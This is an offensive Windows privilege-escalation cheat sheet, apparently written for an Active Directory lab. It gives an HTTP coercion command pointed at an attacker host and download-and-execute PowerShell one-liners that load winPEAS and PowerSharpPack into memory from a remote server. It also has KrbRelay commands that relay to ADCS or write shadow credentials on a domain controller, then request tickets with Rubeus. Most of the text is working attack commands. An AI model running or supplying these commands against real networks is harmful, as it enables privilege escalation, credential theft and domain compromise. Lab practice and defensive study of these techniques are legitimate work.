PrivEsc

Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: 

powershell iwr http://attacker.ip -UseDefaultCredentials

To get an HTTP coerce of the machine account. https://twitter.com/M4yFly/status/1745581076846690811?t=lntNso51gwxHZFPXGnSKpg&s=08

AMSI Bypass

winPEAS in Memory

$data=(New-Object System.Net.WebClient).DownloadData('http://10.10.10.200:8000/winPEASany_ofs.exe');
$asm = [System.Reflection.Assembly]::Load([byte[]]$data);
$out = [Console]::Out;$sWriter = New-Object IO.StringWriter;[Console]::SetOut($sWriter);
[winPEAS.Program]::Main("");[Console]::SetOut($out);$sWriter.ToString()

PowerSharpPack

iex(new-object net.webclient).downloadstring('http://10.10.10.200:8000/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -winPEAS

KrbRelay

  • RBCD (by @an0n_r0)

  • Relay to ADCS w/ web enrollment to request a certificate of template Machine (by @t0-n1)

    # braavos is the server hosting the ADCS
.\CheckPort.exe
$krbrelay = .\KrbRelay.exe -spn http/braavos.essos.local -port 10 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -endpoint certsrv -adcs 'Machine'
$certificate = $krbrelay[-1]
echo $certificate
# The base64 encoded output is usable on `Rubeus.exe`'s `/certificate:<base64>`
Invoke-Rubeus "asktgt /user:BRAAVOS$ /certificate:$certificate /nowrap"

  • Shadowcred (by @icyguider)

    # meereen is the domain controller
.\CheckPort.exe
.\KrbRelay.exe -spn ldap/meereen.essos.local -port 10 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred
# follow the output to use Rubeus

Further Reading